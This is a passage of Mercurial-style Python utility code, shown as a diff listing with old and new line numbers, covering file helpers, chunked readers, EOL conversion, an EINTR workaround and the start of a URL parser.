2266 raise
2257 makedirs(parent, mode, notindexed)
2267 makedirs(parent, mode, notindexed)
2258 try:
2268 try:
2259 makedir(name, notindexed)
2269 makedir(name, notindexed)
2260 except OSError as err:
2270 except OSError as err:
2261 # Catch EEXIST to handle races
2271 # Catch EEXIST to handle races
2262 if err.errno == errno.EEXIST:
2272 if err.errno == errno.EEXIST:
2263 return
2273 return
2264 raise
2274 raise
2265 if mode is not None:
2275 if mode is not None:
2266 os.chmod(name, mode)
2276 os.chmod(name, mode)
2267
2277
2268 def readfile(path):
2278 def readfile(path):
2269 with open(path, 'rb') as fp:
2279 with open(path, 'rb') as fp:
2270 return fp.read()
2280 return fp.read()
2271
2281
2272 def writefile(path, text):
2282 def writefile(path, text):
2273 with open(path, 'wb') as fp:
2283 with open(path, 'wb') as fp:
2274 fp.write(text)
2284 fp.write(text)
2275
2285
2276 def appendfile(path, text):
2286 def appendfile(path, text):
2277 with open(path, 'ab') as fp:
2287 with open(path, 'ab') as fp:
2278 fp.write(text)
2288 fp.write(text)
2279
2289
2280 class chunkbuffer(object):
2290 class chunkbuffer(object):
2281 """Allow arbitrary sized chunks of data to be efficiently read from an
2291 """Allow arbitrary sized chunks of data to be efficiently read from an
2282 iterator over chunks of arbitrary size."""
2292 iterator over chunks of arbitrary size."""
2283
2293
2284 def __init__(self, in_iter):
2294 def __init__(self, in_iter):
2285 """in_iter is the iterator that's iterating over the input chunks."""
2295 """in_iter is the iterator that's iterating over the input chunks."""
2286 def splitbig(chunks):
2296 def splitbig(chunks):
2287 for chunk in chunks:
2297 for chunk in chunks:
2288 if len(chunk) > 2**20:
2298 if len(chunk) > 2**20:
2289 pos = 0
2299 pos = 0
2290 while pos < len(chunk):
2300 while pos < len(chunk):
2291 end = pos + 2 ** 18
2301 end = pos + 2 ** 18
2292 yield chunk[pos:end]
2302 yield chunk[pos:end]
2293 pos = end
2303 pos = end
2294 else:
2304 else:
2295 yield chunk
2305 yield chunk
2296 self.iter = splitbig(in_iter)
2306 self.iter = splitbig(in_iter)
2297 self._queue = collections.deque()
2307 self._queue = collections.deque()
2298 self._chunkoffset = 0
2308 self._chunkoffset = 0
2299
2309
2300 def read(self, l=None):
2310 def read(self, l=None):
2301 """Read L bytes of data from the iterator of chunks of data.
2311 """Read L bytes of data from the iterator of chunks of data.
2302 Returns less than L bytes if the iterator runs dry.
2312 Returns less than L bytes if the iterator runs dry.
2303
2313
2304 If size parameter is omitted, read everything"""
2314 If size parameter is omitted, read everything"""
2305 if l is None:
2315 if l is None:
2306 return ''.join(self.iter)
2316 return ''.join(self.iter)
2307
2317
2308 left = l
2318 left = l
2309 buf = []
2319 buf = []
2310 queue = self._queue
2320 queue = self._queue
2311 while left > 0:
2321 while left > 0:
2312 # refill the queue
2322 # refill the queue
2313 if not queue:
2323 if not queue:
2314 target = 2**18
2324 target = 2**18
2315 for chunk in self.iter:
2325 for chunk in self.iter:
2316 queue.append(chunk)
2326 queue.append(chunk)
2317 target -= len(chunk)
2327 target -= len(chunk)
2318 if target <= 0:
2328 if target <= 0:
2319 break
2329 break
2320 if not queue:
2330 if not queue:
2321 break
2331 break
2322
2332
2323 # The easy way to do this would be to queue.popleft(), modify the
2333 # The easy way to do this would be to queue.popleft(), modify the
2324 # chunk (if necessary), then queue.appendleft(). However, for cases
2334 # chunk (if necessary), then queue.appendleft(). However, for cases
2325 # where we read partial chunk content, this incurs 2 dequeue
2335 # where we read partial chunk content, this incurs 2 dequeue
2326 # mutations and creates a new str for the remaining chunk in the
2336 # mutations and creates a new str for the remaining chunk in the
2327 # queue. Our code below avoids this overhead.
2337 # queue. Our code below avoids this overhead.
2328
2338
2329 chunk = queue[0]
2339 chunk = queue[0]
2330 chunkl = len(chunk)
2340 chunkl = len(chunk)
2331 offset = self._chunkoffset
2341 offset = self._chunkoffset
2332
2342
2333 # Use full chunk.
2343 # Use full chunk.
2334 if offset == 0 and left >= chunkl:
2344 if offset == 0 and left >= chunkl:
2335 left -= chunkl
2345 left -= chunkl
2336 queue.popleft()
2346 queue.popleft()
2337 buf.append(chunk)
2347 buf.append(chunk)
2338 # self._chunkoffset remains at 0.
2348 # self._chunkoffset remains at 0.
2339 continue
2349 continue
2340
2350
2341 chunkremaining = chunkl - offset
2351 chunkremaining = chunkl - offset
2342
2352
2343 # Use all of unconsumed part of chunk.
2353 # Use all of unconsumed part of chunk.
2344 if left >= chunkremaining:
2354 if left >= chunkremaining:
2345 left -= chunkremaining
2355 left -= chunkremaining
2346 queue.popleft()
2356 queue.popleft()
2347 # offset == 0 is enabled by block above, so this won't merely
2357 # offset == 0 is enabled by block above, so this won't merely
2348 # copy via ``chunk[0:]``.
2358 # copy via ``chunk[0:]``.
2349 buf.append(chunk[offset:])
2359 buf.append(chunk[offset:])
2350 self._chunkoffset = 0
2360 self._chunkoffset = 0
2351
2361
2352 # Partial chunk needed.
2362 # Partial chunk needed.
2353 else:
2363 else:
2354 buf.append(chunk[offset:offset + left])
2364 buf.append(chunk[offset:offset + left])
2355 self._chunkoffset += left
2365 self._chunkoffset += left
2356 left -= chunkremaining
2366 left -= chunkremaining
2357
2367
2358 return ''.join(buf)
2368 return ''.join(buf)
2359
2369
2360 def filechunkiter(f, size=131072, limit=None):
2370 def filechunkiter(f, size=131072, limit=None):
2361 """Create a generator that produces the data in the file size
2371 """Create a generator that produces the data in the file size
2362 (default 131072) bytes at a time, up to optional limit (default is
2372 (default 131072) bytes at a time, up to optional limit (default is
2363 to read all data). Chunks may be less than size bytes if the
2373 to read all data). Chunks may be less than size bytes if the
2364 chunk is the last chunk in the file, or the file is a socket or
2374 chunk is the last chunk in the file, or the file is a socket or
2365 some other type of file that sometimes reads less data than is
2375 some other type of file that sometimes reads less data than is
2366 requested."""
2376 requested."""
2367 assert size >= 0
2377 assert size >= 0
2368 assert limit is None or limit >= 0
2378 assert limit is None or limit >= 0
2369 while True:
2379 while True:
2370 if limit is None:
2380 if limit is None:
2371 nbytes = size
2381 nbytes = size
2372 else:
2382 else:
2373 nbytes = min(limit, size)
2383 nbytes = min(limit, size)
2374 s = nbytes and f.read(nbytes)
2384 s = nbytes and f.read(nbytes)
2375 if not s:
2385 if not s:
2376 break
2386 break
2377 if limit:
2387 if limit:
2378 limit -= len(s)
2388 limit -= len(s)
2379 yield s
2389 yield s
2380
2390
2381 class cappedreader(object):
2391 class cappedreader(object):
2382 """A file object proxy that allows reading up to N bytes.
2392 """A file object proxy that allows reading up to N bytes.
2383
2393
2384 Given a source file object, instances of this type allow reading up to
2394 Given a source file object, instances of this type allow reading up to
2385 N bytes from that source file object. Attempts to read past the allowed
2395 N bytes from that source file object. Attempts to read past the allowed
2386 limit are treated as EOF.
2396 limit are treated as EOF.
2387
2397
2388 It is assumed that I/O is not performed on the original file object
2398 It is assumed that I/O is not performed on the original file object
2389 in addition to I/O that is performed by this instance. If there is,
2399 in addition to I/O that is performed by this instance. If there is,
2390 state tracking will get out of sync and unexpected results will ensue.
2400 state tracking will get out of sync and unexpected results will ensue.
2391 """
2401 """
2392 def __init__(self, fh, limit):
2402 def __init__(self, fh, limit):
2393 """Allow reading up to <limit> bytes from <fh>."""
2403 """Allow reading up to <limit> bytes from <fh>."""
2394 self._fh = fh
2404 self._fh = fh
2395 self._left = limit
2405 self._left = limit
2396
2406
2397 def read(self, n=-1):
2407 def read(self, n=-1):
2398 if not self._left:
2408 if not self._left:
2399 return b''
2409 return b''
2400
2410
2401 if n < 0:
2411 if n < 0:
2402 n = self._left
2412 n = self._left
2403
2413
2404 data = self._fh.read(min(n, self._left))
2414 data = self._fh.read(min(n, self._left))
2405 self._left -= len(data)
2415 self._left -= len(data)
2406 assert self._left >= 0
2416 assert self._left >= 0
2407
2417
2408 return data
2418 return data
2409
2419
2410 def readinto(self, b):
2420 def readinto(self, b):
2411 res = self.read(len(b))
2421 res = self.read(len(b))
2412 if res is None:
2422 if res is None:
2413 return None
2423 return None
2414
2424
2415 b[0:len(res)] = res
2425 b[0:len(res)] = res
2416 return len(res)
2426 return len(res)
2417
2427
2418 def unitcountfn(*unittable):
2428 def unitcountfn(*unittable):
2419 '''return a function that renders a readable count of some quantity'''
2429 '''return a function that renders a readable count of some quantity'''
2420
2430
2421 def go(count):
2431 def go(count):
2422 for multiplier, divisor, format in unittable:
2432 for multiplier, divisor, format in unittable:
2423 if abs(count) >= divisor * multiplier:
2433 if abs(count) >= divisor * multiplier:
2424 return format % (count / float(divisor))
2434 return format % (count / float(divisor))
2425 return unittable[-1][2] % count
2435 return unittable[-1][2] % count
2426
2436
2427 return go
2437 return go
2428
2438
2429 def processlinerange(fromline, toline):
2439 def processlinerange(fromline, toline):
2430 """Check that linerange <fromline>:<toline> makes sense and return a
2440 """Check that linerange <fromline>:<toline> makes sense and return a
2431 0-based range.
2441 0-based range.
2432
2442
2433 >>> processlinerange(10, 20)
2443 >>> processlinerange(10, 20)
2434 (9, 20)
2444 (9, 20)
2435 >>> processlinerange(2, 1)
2445 >>> processlinerange(2, 1)
2436 Traceback (most recent call last):
2446 Traceback (most recent call last):
2437 ...
2447 ...
2438 ParseError: line range must be positive
2448 ParseError: line range must be positive
2439 >>> processlinerange(0, 5)
2449 >>> processlinerange(0, 5)
2440 Traceback (most recent call last):
2450 Traceback (most recent call last):
2441 ...
2451 ...
2442 ParseError: fromline must be strictly positive
2452 ParseError: fromline must be strictly positive
2443 """
2453 """
2444 if toline - fromline < 0:
2454 if toline - fromline < 0:
2445 raise error.ParseError(_("line range must be positive"))
2455 raise error.ParseError(_("line range must be positive"))
2446 if fromline < 1:
2456 if fromline < 1:
2447 raise error.ParseError(_("fromline must be strictly positive"))
2457 raise error.ParseError(_("fromline must be strictly positive"))
2448 return fromline - 1, toline
2458 return fromline - 1, toline
2449
2459
2450 bytecount = unitcountfn(
2460 bytecount = unitcountfn(
2451 (100, 1 << 30, _('%.0f GB')),
2461 (100, 1 << 30, _('%.0f GB')),
2452 (10, 1 << 30, _('%.1f GB')),
2462 (10, 1 << 30, _('%.1f GB')),
2453 (1, 1 << 30, _('%.2f GB')),
2463 (1, 1 << 30, _('%.2f GB')),
2454 (100, 1 << 20, _('%.0f MB')),
2464 (100, 1 << 20, _('%.0f MB')),
2455 (10, 1 << 20, _('%.1f MB')),
2465 (10, 1 << 20, _('%.1f MB')),
2456 (1, 1 << 20, _('%.2f MB')),
2466 (1, 1 << 20, _('%.2f MB')),
2457 (100, 1 << 10, _('%.0f KB')),
2467 (100, 1 << 10, _('%.0f KB')),
2458 (10, 1 << 10, _('%.1f KB')),
2468 (10, 1 << 10, _('%.1f KB')),
2459 (1, 1 << 10, _('%.2f KB')),
2469 (1, 1 << 10, _('%.2f KB')),
2460 (1, 1, _('%.0f bytes')),
2470 (1, 1, _('%.0f bytes')),
2461 )
2471 )
2462
2472
2463 class transformingwriter(object):
2473 class transformingwriter(object):
2464 """Writable file wrapper to transform data by function"""
2474 """Writable file wrapper to transform data by function"""
2465
2475
2466 def __init__(self, fp, encode):
2476 def __init__(self, fp, encode):
2467 self._fp = fp
2477 self._fp = fp
2468 self._encode = encode
2478 self._encode = encode
2469
2479
2470 def close(self):
2480 def close(self):
2471 self._fp.close()
2481 self._fp.close()
2472
2482
2473 def flush(self):
2483 def flush(self):
2474 self._fp.flush()
2484 self._fp.flush()
2475
2485
2476 def write(self, data):
2486 def write(self, data):
2477 return self._fp.write(self._encode(data))
2487 return self._fp.write(self._encode(data))
2478
2488
2479 # Matches a single EOL which can either be a CRLF where repeated CR
2489 # Matches a single EOL which can either be a CRLF where repeated CR
2480 # are removed or a LF. We do not care about old Macintosh files, so a
2490 # are removed or a LF. We do not care about old Macintosh files, so a
2481 # stray CR is an error.
2491 # stray CR is an error.
2482 _eolre = remod.compile(br'\r*\n')
2492 _eolre = remod.compile(br'\r*\n')
2483
2493
2484 def tolf(s):
2494 def tolf(s):
2485 return _eolre.sub('\n', s)
2495 return _eolre.sub('\n', s)
2486
2496
2487 def tocrlf(s):
2497 def tocrlf(s):
2488 return _eolre.sub('\r\n', s)
2498 return _eolre.sub('\r\n', s)
2489
2499
2490 def _crlfwriter(fp):
2500 def _crlfwriter(fp):
2491 return transformingwriter(fp, tocrlf)
2501 return transformingwriter(fp, tocrlf)
2492
2502
2493 if pycompat.oslinesep == '\r\n':
2503 if pycompat.oslinesep == '\r\n':
2494 tonativeeol = tocrlf
2504 tonativeeol = tocrlf
2495 fromnativeeol = tolf
2505 fromnativeeol = tolf
2496 nativeeolwriter = _crlfwriter
2506 nativeeolwriter = _crlfwriter
2497 else:
2507 else:
2498 tonativeeol = pycompat.identity
2508 tonativeeol = pycompat.identity
2499 fromnativeeol = pycompat.identity
2509 fromnativeeol = pycompat.identity
2500 nativeeolwriter = pycompat.identity
2510 nativeeolwriter = pycompat.identity
2501
2511
2502 if (pyplatform.python_implementation() == 'CPython' and
2512 if (pyplatform.python_implementation() == 'CPython' and
2503 sys.version_info < (3, 0)):
2513 sys.version_info < (3, 0)):
2504 # There is an issue in CPython that some IO methods do not handle EINTR
2514 # There is an issue in CPython that some IO methods do not handle EINTR
2505 # correctly. The following table shows what CPython version (and functions)
2515 # correctly. The following table shows what CPython version (and functions)
2506 # are affected (buggy: has the EINTR bug, okay: otherwise):
2516 # are affected (buggy: has the EINTR bug, okay: otherwise):
2507 #
2517 #
2508 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2518 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2509 # --------------------------------------------------
2519 # --------------------------------------------------
2510 # fp.__iter__ | buggy | buggy | okay
2520 # fp.__iter__ | buggy | buggy | okay
2511 # fp.read* | buggy | okay [1] | okay
2521 # fp.read* | buggy | okay [1] | okay
2512 #
2522 #
2513 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2523 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2514 #
2524 #
2515 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2525 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2516 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2526 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2517 #
2527 #
2518 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2528 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2519 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2529 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2520 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2530 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2521 # fp.__iter__ but not other fp.read* methods.
2531 # fp.__iter__ but not other fp.read* methods.
2522 #
2532 #
2523 # On modern systems like Linux, the "read" syscall cannot be interrupted
2533 # On modern systems like Linux, the "read" syscall cannot be interrupted
2524 # when reading "fast" files like on-disk files. So the EINTR issue only
2534 # when reading "fast" files like on-disk files. So the EINTR issue only
2525 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2535 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2526 # files approximately as "fast" files and use the fast (unsafe) code path,
2536 # files approximately as "fast" files and use the fast (unsafe) code path,
2527 # to minimize the performance impact.
2537 # to minimize the performance impact.
2528 if sys.version_info >= (2, 7, 4):
2538 if sys.version_info >= (2, 7, 4):
2529 # fp.readline deals with EINTR correctly, use it as a workaround.
2539 # fp.readline deals with EINTR correctly, use it as a workaround.
2530 def _safeiterfile(fp):
2540 def _safeiterfile(fp):
2531 return iter(fp.readline, '')
2541 return iter(fp.readline, '')
2532 else:
2542 else:
2533 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2543 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2534 # note: this may block longer than necessary because of bufsize.
2544 # note: this may block longer than necessary because of bufsize.
2535 def _safeiterfile(fp, bufsize=4096):
2545 def _safeiterfile(fp, bufsize=4096):
2536 fd = fp.fileno()
2546 fd = fp.fileno()
2537 line = ''
2547 line = ''
2538 while True:
2548 while True:
2539 try:
2549 try:
2540 buf = os.read(fd, bufsize)
2550 buf = os.read(fd, bufsize)
2541 except OSError as ex:
2551 except OSError as ex:
2542 # os.read only raises EINTR before any data is read
2552 # os.read only raises EINTR before any data is read
2543 if ex.errno == errno.EINTR:
2553 if ex.errno == errno.EINTR:
2544 continue
2554 continue
2545 else:
2555 else:
2546 raise
2556 raise
2547 line += buf
2557 line += buf
2548 if '\n' in buf:
2558 if '\n' in buf:
2549 splitted = line.splitlines(True)
2559 splitted = line.splitlines(True)
2550 line = ''
2560 line = ''
2551 for l in splitted:
2561 for l in splitted:
2552 if l[-1] == '\n':
2562 if l[-1] == '\n':
2553 yield l
2563 yield l
2554 else:
2564 else:
2555 line = l
2565 line = l
2556 if not buf:
2566 if not buf:
2557 break
2567 break
2558 if line:
2568 if line:
2559 yield line
2569 yield line
2560
2570
2561 def iterfile(fp):
2571 def iterfile(fp):
2562 fastpath = True
2572 fastpath = True
2563 if type(fp) is file:
2573 if type(fp) is file:
2564 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2574 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2565 if fastpath:
2575 if fastpath:
2566 return fp
2576 return fp
2567 else:
2577 else:
2568 return _safeiterfile(fp)
2578 return _safeiterfile(fp)
2569 else:
2579 else:
2570 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2580 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2571 def iterfile(fp):
2581 def iterfile(fp):
2572 return fp
2582 return fp
2573
2583
2574 def iterlines(iterator):
2584 def iterlines(iterator):
2575 for chunk in iterator:
2585 for chunk in iterator:
2576 for line in chunk.splitlines():
2586 for line in chunk.splitlines():
2577 yield line
2587 yield line
2578
2588
2579 def expandpath(path):
2589 def expandpath(path):
2580 return os.path.expanduser(os.path.expandvars(path))
2590 return os.path.expanduser(os.path.expandvars(path))
2581
2591
2582 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2592 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2583 """Return the result of interpolating items in the mapping into string s.
2593 """Return the result of interpolating items in the mapping into string s.
2584
2594
2585 prefix is a single character string, or a two character string with
2595 prefix is a single character string, or a two character string with
2586 a backslash as the first character if the prefix needs to be escaped in
2596 a backslash as the first character if the prefix needs to be escaped in
2587 a regular expression.
2597 a regular expression.
2588
2598
2589 fn is an optional function that will be applied to the replacement text
2599 fn is an optional function that will be applied to the replacement text
2590 just before replacement.
2600 just before replacement.
2591
2601
2592 escape_prefix is an optional flag that allows using doubled prefix for
2602 escape_prefix is an optional flag that allows using doubled prefix for
2593 its escaping.
2603 its escaping.
2594 """
2604 """
2595 fn = fn or (lambda s: s)
2605 fn = fn or (lambda s: s)
2596 patterns = '|'.join(mapping.keys())
2606 patterns = '|'.join(mapping.keys())
2597 if escape_prefix:
2607 if escape_prefix:
2598 patterns += '|' + prefix
2608 patterns += '|' + prefix
2599 if len(prefix) > 1:
2609 if len(prefix) > 1:
2600 prefix_char = prefix[1:]
2610 prefix_char = prefix[1:]
2601 else:
2611 else:
2602 prefix_char = prefix
2612 prefix_char = prefix
2603 mapping[prefix_char] = prefix_char
2613 mapping[prefix_char] = prefix_char
2604 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2614 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2605 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2615 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2606
2616
2607 def getport(port):
2617 def getport(port):
2608 """Return the port for a given network service.
2618 """Return the port for a given network service.
2609
2619
2610 If port is an integer, it's returned as is. If it's a string, it's
2620 If port is an integer, it's returned as is. If it's a string, it's
2611 looked up using socket.getservbyname(). If there's no matching
2621 looked up using socket.getservbyname(). If there's no matching
2612 service, error.Abort is raised.
2622 service, error.Abort is raised.
2613 """
2623 """
2614 try:
2624 try:
2615 return int(port)
2625 return int(port)
2616 except ValueError:
2626 except ValueError:
2617 pass
2627 pass
2618
2628
2619 try:
2629 try:
2620 return socket.getservbyname(pycompat.sysstr(port))
2630 return socket.getservbyname(pycompat.sysstr(port))
2621 except socket.error:
2631 except socket.error:
2622 raise error.Abort(_("no port number associated with service '%s'")
2632 raise error.Abort(_("no port number associated with service '%s'")
2623 % port)
2633 % port)
2624
2634
2625 class url(object):
2635 class url(object):
2626 r"""Reliable URL parser.
2636 r"""Reliable URL parser.
2627
2637
2628 This parses URLs and provides attributes for the following
2638 This parses URLs and provides attributes for the following
2629 components:
2639 components:
2630
2640
2631 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2641 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2632
2642
2633 Missing components are set to None. The only exception is
2643 Missing components are set to None. The only exception is
2634 fragment, which is set to '' if present but empty.
2644 fragment, which is set to '' if present but empty.
2635
2645
2636 If parsefragment is False, fragment is included in query. If
2646 If parsefragment is False, fragment is included in query. If
2637 parsequery is False, query is included in path. If both are
2647 parsequery is False, query is included in path. If both are
2638 False, both fragment and query are included in path.
2648 False, both fragment and query are included in path.
2639
2649
2640 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2650 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2641
2651
2642 Note that for backward compatibility reasons, bundle URLs do not
2652 Note that for backward compatibility reasons, bundle URLs do not
2643 take host names. That means 'bundle://../' has a path of '../'.
2653 take host names. That means 'bundle://../' has a path of '../'.
2644
2654
2645 Examples:
2655 Examples:
2646
2656
2647 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2657 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2648 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2658 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2649 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2659 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2650 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2660 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2651 >>> url(b'file:///home/joe/repo')
2661 >>> url(b'file:///home/joe/repo')
2652 <url scheme: 'file', path: '/home/joe/repo'>
2662 <url scheme: 'file', path: '/home/joe/repo'>
2653 >>> url(b'file:///c:/temp/foo/')
2663 >>> url(b'file:///c:/temp/foo/')
2654 <url scheme: 'file', path: 'c:/temp/foo/'>
2664 <url scheme: 'file', path: 'c:/temp/foo/'>
2655 >>> url(b'bundle:foo')
2665 >>> url(b'bundle:foo')
2656 <url scheme: 'bundle', path: 'foo'>
2666 <url scheme: 'bundle', path: 'foo'>
2657 >>> url(b'bundle://../foo')
2667 >>> url(b'bundle://../foo')
2658 <url scheme: 'bundle', path: '../foo'>
2668 <url scheme: 'bundle', path: '../foo'>
2659 >>> url(br'c:\foo\bar')
2669 >>> url(br'c:\foo\bar')
2660 <url path: 'c:\\foo\\bar'>
2670 <url path: 'c:\\foo\\bar'>
2661 >>> url(br'\\blah\blah\blah')
2671 >>> url(br'\\blah\blah\blah')
2662 <url path: '\\\\blah\\blah\\blah'>
2672 <url path: '\\\\blah\\blah\\blah'>
2663 >>> url(br'\\blah\blah\blah#baz')
2673 >>> url(br'\\blah\blah\blah#baz')
2664 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2674 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2665 >>> url(br'file:///C:\users\me')
2675 >>> url(br'file:///C:\users\me')
2666 <url scheme: 'file', path: 'C:\\users\\me'>
2676 <url scheme: 'file', path: 'C:\\users\\me'>
2667
2677
2668 Authentication credentials:
2678 Authentication credentials:
2669
2679
2670 >>> url(b'ssh://joe:xyz@x/repo')
2680 >>> url(b'ssh://joe:xyz@x/repo')
2671 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2681 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2672 >>> url(b'ssh://joe@x/repo')
2682 >>> url(b'ssh://joe@x/repo')
2673 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2683 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2674
2684
2675 Query strings and fragments:
2685 Query strings and fragments:
2676
2686
2677 >>> url(b'http://host/a?b#c')
2687 >>> url(b'http://host/a?b#c')
2678 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2688 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2679 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2689 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2680 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2690 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2681
2691
2682 Empty path:
2692 Empty path:
2683
2693
2684 >>> url(b'')
2694 >>> url(b'')
2685 <url path: ''>
2695 <url path: ''>
2686 >>> url(b'#a')
2696 >>> url(b'#a')
2687 <url path: '', fragment: 'a'>
2697 <url path: '', fragment: 'a'>
2688 >>> url(b'http://host/')
2698 >>> url(b'http://host/')
2689 <url scheme: 'http', host: 'host', path: ''>
2699 <url scheme: 'http', host: 'host', path: ''>
2690 >>> url(b'http://host/#a')
2700 >>> url(b'http://host/#a')
2691 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2701 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2692
2702
2693 Only scheme:
2703 Only scheme:
2694
2704
2695 >>> url(b'http:')
2705 >>> url(b'http:')
2696 <url scheme: 'http'>
2706 <url scheme: 'http'>
2697 """
2707 """
2698
2708
2699 _safechars = "!~*'()+"
2709 _safechars = "!~*'()+"
2700 _safepchars = "/!~*'()+:\\"
2710 _safepchars = "/!~*'()+:\\"
2701 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2711 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2702
2712
2703 def __init__(self, path, parsequery=True, parsefragment=True):
2713 def __init__(self, path, parsequery=True, parsefragment=True):
2704 # We slowly chomp away at path until we have only the path left
2714 # We slowly chomp away at path until we have only the path left
2705 self.scheme = self.user = self.passwd = self.host = None
2715 self.scheme = self.user = self.passwd = self.host = None
2706 self.port = self.path = self.query = self.fragment = None
2716 self.port = self.path = self.query = self.fragment = None
2707 self._localpath = True
2717 self._localpath = True
2708 self._hostport = ''
2718 self._hostport = ''
2709 self._origpath = path
2719 self._origpath = path
2710
2720
2711 if parsefragment and '#' in path:
2721 if parsefragment and '#' in path:
2712 path, self.fragment = path.split('#', 1)
2722 path, self.fragment = path.split('#', 1)
2713
2723
2714 # special case for Windows drive letters and UNC paths
2724 # special case for Windows drive letters and UNC paths
2715 if hasdriveletter(path) or path.startswith('\\\\'):
2725 if hasdriveletter(path) or path.startswith('\\\\'):
2716 self.path = path
2726 self.path = path
2717 return
2727 return
2718
2728
2719 # For compatibility reasons, we can't handle bundle paths as
2729 # For compatibility reasons, we can't handle bundle paths as
2720 # normal URLS
2730 # normal URLS
2721 if path.startswith('bundle:'):
2731 if path.startswith('bundle:'):
2722 self.scheme = 'bundle'
2732 self.scheme = 'bundle'
2723 path = path[7:]
2733 path = path[7:]
2724 if path.startswith('//'):
2734 if path.startswith('//'):
2725 path = path[2:]
2735 path = path[2:]
2726 self.path = path
2736 self.path = path
2727 return
2737 return
2728
2738
2729 if self._matchscheme(path):
2739 if self._matchscheme(path):
2730 parts = path.split(':', 1)
2740 parts = path.split(':', 1)
2731 if parts[0]:
2741 if parts[0]:
2732 self.scheme, path = parts
2742 self.scheme, path = parts
2733 self._localpath = False
2743 self._localpath = False
2734
2744
2735 if not path:
2745 if not path:
2736 path = None
2746 path = None
2737 if self._localpath:
2747 if self._localpath:
2738 self.path = ''
2748 self.path = ''
2739 return
2749 return
2740 else:
2750 else:
2741 if self._localpath:
2751 if self._localpath:
2742 self.path = path
2752 self.path = path
2743 return
2753 return
2744
2754
2745 if parsequery and '?' in path:
2755 if parsequery and '?' in path:
2746 path, self.query = path.split('?', 1)
2756 path, self.query = path.split('?', 1)
2747 if not path:
2757 if not path:
2748 path = None
2758 path = None
2749 if not self.query:
2759 if not self.query:
2750 self.query = None
2760 self.query = None
2751
2761
2752 # // is required to specify a host/authority
2762 # // is required to specify a host/authority
2753 if path and path.startswith('//'):
2763 if path and path.startswith('//'):
2754 parts = path[2:].split('/', 1)
2764 parts = path[2:].split('/', 1)
2755 if len(parts) > 1:
2765 if len(parts) > 1:
2756 self.host, path = parts
2766 self.host, path = parts
2757 else:
2767 else:
2758 self.host = parts[0]
2768 self.host = parts[0]
2759 path = None
2769 path = None
2760 if not self.host:
2770 if not self.host:
2761 self.host = None
2771 self.host = None
2762 # path of file:///d is /d
2772 # path of file:///d is /d
2763 # path of file:///d:/ is d:/, not /d:/
2773 # path of file:///d:/ is d:/, not /d:/
2764 if path and not hasdriveletter(path):
2774 if path and not hasdriveletter(path):
2765 path = '/' + path
2775 path = '/' + path
2766
2776
2767 if self.host and '@' in self.host:
2777 if self.host and '@' in self.host:
2768 self.user, self.host = self.host.rsplit('@', 1)
2778 self.user, self.host = self.host.rsplit('@', 1)
2769 if ':' in self.user:
2779 if ':' in self.user:
2770 self.user, self.passwd = self.user.split(':', 1)
2780 self.user, self.passwd = self.user.split(':', 1)
2771 if not self.host:
2781 if not self.host:
2772 self.host = None
2782 self.host = None
2773
2783
2774 # Don't split on colons in IPv6 addresses without ports
2784 # Don't split on colons in IPv6 addresses without ports
2775 if (self.host and ':' in self.host and
2785 if (self.host and ':' in self.host and
